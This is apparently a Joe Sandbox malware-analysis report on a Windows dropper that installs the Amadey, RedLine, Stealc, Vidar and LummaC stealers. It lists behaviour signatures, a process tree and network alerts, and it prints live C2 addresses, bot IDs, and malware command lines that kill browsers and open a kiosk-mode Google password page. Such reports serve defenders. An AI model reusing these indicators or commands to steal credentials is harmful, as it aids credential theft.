Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1573850
MD5:ad7f121646aa374af133772519375710
SHA1:4e85ad004aa170ed53b7818b78e0b12e042b18ea
SHA256:d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f
Tags:exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Changes memory attributes in foreign processes to executable or writable
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to determine the online IP of the system
Creates a thread in another existing process (thread injection)
Creates files in the system32 config directory
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to enumerate network shares
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7812 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AD7F121646AA374AF133772519375710)
    • skotes.exe (PID: 8056 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: AD7F121646AA374AF133772519375710)
  • skotes.exe (PID: 8168 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: AD7F121646AA374AF133772519375710)
  • skotes.exe (PID: 7820 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: AD7F121646AA374AF133772519375710)
    • dwVrTdy.exe (PID: 8092 cmdline: "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe" MD5: 3567CB15156760B2F111512FFDBC1451)
      • graph.exe (PID: 7320 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
    • AzVRM7c.exe (PID: 1528 cmdline: "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe" MD5: 3567CB15156760B2F111512FFDBC1451)
      • graph.exe (PID: 5096 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
    • t5abhIx.exe (PID: 1868 cmdline: "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe" MD5: 3567CB15156760B2F111512FFDBC1451)
    • u1w30Wt.exe (PID: 4928 cmdline: "C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe" MD5: FF1E7643A5C9294BD8E8FD743B323C8F)
      • audiodg.exe (PID: 4952 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
      • msiexec.exe (PID: 5048 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
      • svchost.exe (PID: 4812 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • graph.exe (PID: 4940 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
          • 2DB3A69DE7692371543510.exe (PID: 3800 cmdline: "C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe" MD5: FF1E7643A5C9294BD8E8FD743B323C8F)
            • msiexec.exe (PID: 5212 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
            • audiodg.exe (PID: 6760 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
            • svchost.exe (PID: 5956 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • graph.exe (PID: 1264 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
          • F0A3.tmp.ctx.exe (PID: 3640 cmdline: "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe" MD5: AE2A4249C8389603933DF4F806546C96)
            • F0A3.tmp.ctx.exe (PID: 6600 cmdline: "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe" MD5: AE2A4249C8389603933DF4F806546C96)
          • FBFF.tmp.fcxcx.exe (PID: 520 cmdline: "C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe" MD5: F0AAF1B673A9316C4B899CCC4E12D33E)
          • firefox.exe (PID: 5632 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
            • firefox.exe (PID: 504 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • be08f59021.exe (PID: 5584 cmdline: "C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe" MD5: 5A3F6AA1107D91BDC0430E2A0C1F4F26)
    • 602c785fe5.exe (PID: 1660 cmdline: "C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe" MD5: E477E0C89BDFE4F98170878F85624A0C)
      • taskkill.exe (PID: 6796 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4524 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 2592 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1672 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4408 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • firefox.exe (PID: 980 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • d8d3046b98.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe" MD5: CD917C036DA4DC2B3E30E12B135A87E2)
  • dwVrTdy.exe (PID: 8120 cmdline: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe MD5: 3567CB15156760B2F111512FFDBC1451)
    • graph.exe (PID: 1900 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
{"C2 url": ["185.81.68.147:1912"], "Bot Id": "fvcxcx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
        sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
            • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
            • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
            C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
              • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
              • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
              SourceRuleDescriptionAuthorStrings
              0000002C.00000002.2615996030.00000144AA140000.00000040.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
              • 0x3dded:$s2: ReflectiveLoader@
              00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000026.00000000.2427424681.0000000000E52000.00000002.00000001.01000000.00000012.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    0000002B.00000002.2491500061.000002392DCA0000.00000040.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                    • 0x3dded:$s2: ReflectiveLoader@
                    Click to see the 9 entries
                    SourceRuleDescriptionAuthorStrings
                    38.0.FBFF.tmp.fcxcx.exe.e50000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      44.2.firefox.exe.144aa0f0000.0.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                      • 0x3b5ed:$s2: ReflectiveLoader@
                      43.2.firefox.exe.2392c270000.0.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                      • 0x3b5ed:$s2: ReflectiveLoader@
                      44.2.firefox.exe.144aa140000.1.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                      • 0x3dded:$s2: ReflectiveLoader@
                      44.2.firefox.exe.144aa140000.1.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                      • 0x3c9ed:$s2: ReflectiveLoader@
                      Click to see the 11 entries

                      System Summary

                      barindex
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7820, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\602c785fe5.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7820, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\602c785fe5.exe
                      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 3968, StartAddress: 2C28AA50, TargetImage: C:\Program Files\Mozilla Firefox\firefox.exe, TargetProcessId: 5632
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe, ParentProcessId: 4928, ParentProcessName: u1w30Wt.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 4812, ProcessName: svchost.exe
                      Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe, ParentProcessId: 4928, ParentProcessName: u1w30Wt.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 4812, ProcessName: svchost.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:50:28.617180+010020283713Unknown Traffic192.168.2.1050238172.67.213.48443TCP
                      2024-12-12T16:50:33.485834+010020283713Unknown Traffic192.168.2.1050259172.67.213.48443TCP
                      2024-12-12T16:50:35.808854+010020283713Unknown Traffic192.168.2.1050263172.67.213.48443TCP
                      2024-12-12T16:50:37.870851+010020283713Unknown Traffic192.168.2.1050267172.67.213.48443TCP
                      2024-12-12T16:50:40.450539+010020283713Unknown Traffic192.168.2.1050271172.67.213.48443TCP
                      2024-12-12T16:50:43.338354+010020283713Unknown Traffic192.168.2.1050284172.67.213.48443TCP
                      2024-12-12T16:50:49.617379+010020283713Unknown Traffic192.168.2.1050299172.67.213.48443TCP
                      2024-12-12T16:50:52.161845+010020283713Unknown Traffic192.168.2.1050308172.67.213.48443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:49:22.815800+010020446231A Network Trojan was detected192.168.2.1050047185.215.113.4380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:48:37.185345+010020229861A Network Trojan was detected192.168.2.1049933185.81.68.14780TCP
                      2024-12-12T16:48:37.429929+010020229861A Network Trojan was detected192.168.2.1049938185.81.68.14780TCP
                      2024-12-12T16:48:39.209260+010020229861A Network Trojan was detected192.168.2.1049943185.81.68.14780TCP
                      2024-12-12T16:48:57.805054+010020229861A Network Trojan was detected192.168.2.1049989185.81.68.14780TCP
                      2024-12-12T16:48:58.053827+010020229861A Network Trojan was detected192.168.2.1049996185.81.68.14780TCP
                      2024-12-12T16:49:00.539654+010020229861A Network Trojan was detected192.168.2.1049998185.81.68.14780TCP
                      2024-12-12T16:49:00.782649+010020229861A Network Trojan was detected192.168.2.1050008185.81.68.14780TCP
                      2024-12-12T16:49:01.392290+010020229861A Network Trojan was detected192.168.2.1050011185.81.68.14780TCP
                      2024-12-12T16:49:03.271064+010020229861A Network Trojan was detected192.168.2.1050017185.81.68.14780TCP
                      2024-12-12T16:49:05.207591+010020229861A Network Trojan was detected192.168.2.1050021185.81.68.14780TCP
                      2024-12-12T16:49:07.246330+010020229861A Network Trojan was detected192.168.2.1050030185.81.68.14780TCP
                      2024-12-12T16:49:08.908525+010020229861A Network Trojan was detected192.168.2.1050034185.81.68.14780TCP
                      2024-12-12T16:49:10.703399+010020229861A Network Trojan was detected192.168.2.1050036185.81.68.14780TCP
                      2024-12-12T16:49:12.687511+010020229861A Network Trojan was detected192.168.2.1050038185.81.68.14780TCP
                      2024-12-12T16:49:14.392460+010020229861A Network Trojan was detected192.168.2.1050040185.81.68.14780TCP
                      2024-12-12T16:49:16.046870+010020229861A Network Trojan was detected192.168.2.1050041185.81.68.14780TCP
                      2024-12-12T16:49:17.891832+010020229861A Network Trojan was detected192.168.2.1050043185.81.68.14780TCP
                      2024-12-12T16:49:19.946252+010020229861A Network Trojan was detected192.168.2.1050045185.81.68.14780TCP
                      2024-12-12T16:49:22.019394+010020229861A Network Trojan was detected192.168.2.1050048185.81.68.14780TCP
                      2024-12-12T16:49:23.947453+010020229861A Network Trojan was detected192.168.2.1050050185.81.68.14780TCP
                      2024-12-12T16:49:25.845097+010020229861A Network Trojan was detected192.168.2.1050060185.81.68.14780TCP
                      2024-12-12T16:49:27.692012+010020229861A Network Trojan was detected192.168.2.1050061185.81.68.14780TCP
                      2024-12-12T16:49:29.585615+010020229861A Network Trojan was detected192.168.2.1050064185.81.68.14780TCP
                      2024-12-12T16:49:32.035333+010020229861A Network Trojan was detected192.168.2.1050067185.81.68.14780TCP
                      2024-12-12T16:49:32.277224+010020229861A Network Trojan was detected192.168.2.1050068185.81.68.14780TCP
                      2024-12-12T16:49:32.570048+010020229861A Network Trojan was detected192.168.2.1050070185.81.68.14780TCP
                      2024-12-12T16:49:34.388673+010020229861A Network Trojan was detected192.168.2.1050071185.81.68.14780TCP
                      2024-12-12T16:49:36.018645+010020229861A Network Trojan was detected192.168.2.1050072185.81.68.14780TCP
                      2024-12-12T16:49:36.259903+010020229861A Network Trojan was detected192.168.2.1050075185.81.68.14780TCP
                      2024-12-12T16:49:36.271923+010020229861A Network Trojan was detected192.168.2.1050076185.81.68.14780TCP
                      2024-12-12T16:49:38.318334+010020229861A Network Trojan was detected192.168.2.1050080185.81.68.14780TCP
                      2024-12-12T16:49:40.224291+010020229861A Network Trojan was detected192.168.2.1050085185.81.68.14780TCP
                      2024-12-12T16:49:42.123906+010020229861A Network Trojan was detected192.168.2.1050091185.81.68.14780TCP
                      2024-12-12T16:49:43.896529+010020229861A Network Trojan was detected192.168.2.1050104185.81.68.14780TCP
                      2024-12-12T16:49:45.761525+010020229861A Network Trojan was detected192.168.2.1050120185.81.68.14780TCP
                      2024-12-12T16:49:47.592431+010020229861A Network Trojan was detected192.168.2.1050124185.81.68.14780TCP
                      2024-12-12T16:49:49.279394+010020229861A Network Trojan was detected192.168.2.1050127185.81.68.14780TCP
                      2024-12-12T16:49:51.229821+010020229861A Network Trojan was detected192.168.2.1050128185.81.68.14780TCP
                      2024-12-12T16:49:53.073352+010020229861A Network Trojan was detected192.168.2.1050131185.81.68.14780TCP
                      2024-12-12T16:49:55.009969+010020229861A Network Trojan was detected192.168.2.1050134185.81.68.14780TCP
                      2024-12-12T16:49:56.698622+010020229861A Network Trojan was detected192.168.2.1050136185.81.68.14780TCP
                      2024-12-12T16:49:58.579931+010020229861A Network Trojan was detected192.168.2.1050139185.81.68.14780TCP
                      2024-12-12T16:50:00.279337+010020229861A Network Trojan was detected192.168.2.1050141185.81.68.14780TCP
                      2024-12-12T16:50:02.307286+010020229861A Network Trojan was detected192.168.2.1050146185.81.68.14780TCP
                      2024-12-12T16:50:04.012827+010020229861A Network Trojan was detected192.168.2.1050148185.81.68.14780TCP
                      2024-12-12T16:50:04.214882+010020229861A Network Trojan was detected192.168.2.1050147185.81.68.14780TCP
                      2024-12-12T16:50:04.464069+010020229861A Network Trojan was detected192.168.2.1050150185.81.68.14780TCP
                      2024-12-12T16:50:06.015974+010020229861A Network Trojan was detected192.168.2.1050156185.81.68.14780TCP
                      2024-12-12T16:50:08.068063+010020229861A Network Trojan was detected192.168.2.1050165185.81.68.14780TCP
                      2024-12-12T16:50:08.956599+010020229861A Network Trojan was detected192.168.2.1050164185.81.68.14780TCP
                      2024-12-12T16:50:09.269536+010020229861A Network Trojan was detected192.168.2.1050174185.81.68.14780TCP
                      2024-12-12T16:50:09.904036+010020229861A Network Trojan was detected192.168.2.1050176185.81.68.14780TCP
                      2024-12-12T16:50:11.742161+010020229861A Network Trojan was detected192.168.2.1050182185.81.68.14780TCP
                      2024-12-12T16:50:13.465562+010020229861A Network Trojan was detected192.168.2.1050184185.81.68.14780TCP
                      2024-12-12T16:50:15.152143+010020229861A Network Trojan was detected192.168.2.1050192185.81.68.14780TCP
                      2024-12-12T16:50:17.071221+010020229861A Network Trojan was detected192.168.2.1050195185.81.68.14780TCP
                      2024-12-12T16:50:19.044987+010020229861A Network Trojan was detected192.168.2.1050196185.81.68.14780TCP
                      2024-12-12T16:50:20.988187+010020229861A Network Trojan was detected192.168.2.1050202185.81.68.14780TCP
                      2024-12-12T16:50:22.890926+010020229861A Network Trojan was detected192.168.2.1050207185.81.68.14780TCP
                      2024-12-12T16:50:24.882642+010020229861A Network Trojan was detected192.168.2.1050221185.81.68.14780TCP
                      2024-12-12T16:50:26.627266+010020229861A Network Trojan was detected192.168.2.1050233185.81.68.14780TCP
                      2024-12-12T16:50:28.320557+010020229861A Network Trojan was detected192.168.2.1050243185.81.68.14780TCP
                      2024-12-12T16:50:30.297076+010020229861A Network Trojan was detected192.168.2.1050254185.81.68.14780TCP
                      2024-12-12T16:50:32.183845+010020229861A Network Trojan was detected192.168.2.1050258185.81.68.14780TCP
                      2024-12-12T16:50:34.064096+010020229861A Network Trojan was detected192.168.2.1050261185.81.68.14780TCP
                      2024-12-12T16:50:35.876600+010020229861A Network Trojan was detected192.168.2.1050265185.81.68.14780TCP
                      2024-12-12T16:50:37.750819+010020229861A Network Trojan was detected192.168.2.1050268185.81.68.14780TCP
                      2024-12-12T16:50:39.704101+010020229861A Network Trojan was detected192.168.2.1050272185.81.68.14780TCP
                      2024-12-12T16:50:41.581306+010020229861A Network Trojan was detected192.168.2.1050275185.81.68.14780TCP
                      2024-12-12T16:50:43.584964+010020229861A Network Trojan was detected192.168.2.1050288185.81.68.14780TCP
                      2024-12-12T16:50:45.346981+010020229861A Network Trojan was detected192.168.2.1050294185.81.68.14780TCP
                      2024-12-12T16:50:47.034246+010020229861A Network Trojan was detected192.168.2.1050296185.81.68.14780TCP
                      2024-12-12T16:50:48.854420+010020229861A Network Trojan was detected192.168.2.1050300185.81.68.14780TCP
                      2024-12-12T16:50:50.537748+010020229861A Network Trojan was detected192.168.2.1050302185.81.68.14780TCP
                      2024-12-12T16:50:52.370878+010020229861A Network Trojan was detected192.168.2.1050311185.81.68.14780TCP
                      2024-12-12T16:50:54.079049+010020229861A Network Trojan was detected192.168.2.1050316185.81.68.14780TCP
                      2024-12-12T16:50:55.996365+010020229861A Network Trojan was detected192.168.2.1050319185.81.68.14780TCP
                      2024-12-12T16:50:57.999225+010020229861A Network Trojan was detected192.168.2.1050329185.81.68.14780TCP
                      2024-12-12T16:50:59.837977+010020229861A Network Trojan was detected192.168.2.1050330185.81.68.14780TCP
                      2024-12-12T16:51:01.617885+010020229861A Network Trojan was detected192.168.2.1050332185.81.68.14780TCP
                      2024-12-12T16:51:07.739107+010020229861A Network Trojan was detected192.168.2.1050337185.81.68.14780TCP
                      2024-12-12T16:51:09.658808+010020229861A Network Trojan was detected192.168.2.1050339185.81.68.14780TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:50:29.760539+010020546531A Network Trojan was detected192.168.2.1050238172.67.213.48443TCP
                      2024-12-12T16:50:34.198263+010020546531A Network Trojan was detected192.168.2.1050259172.67.213.48443TCP
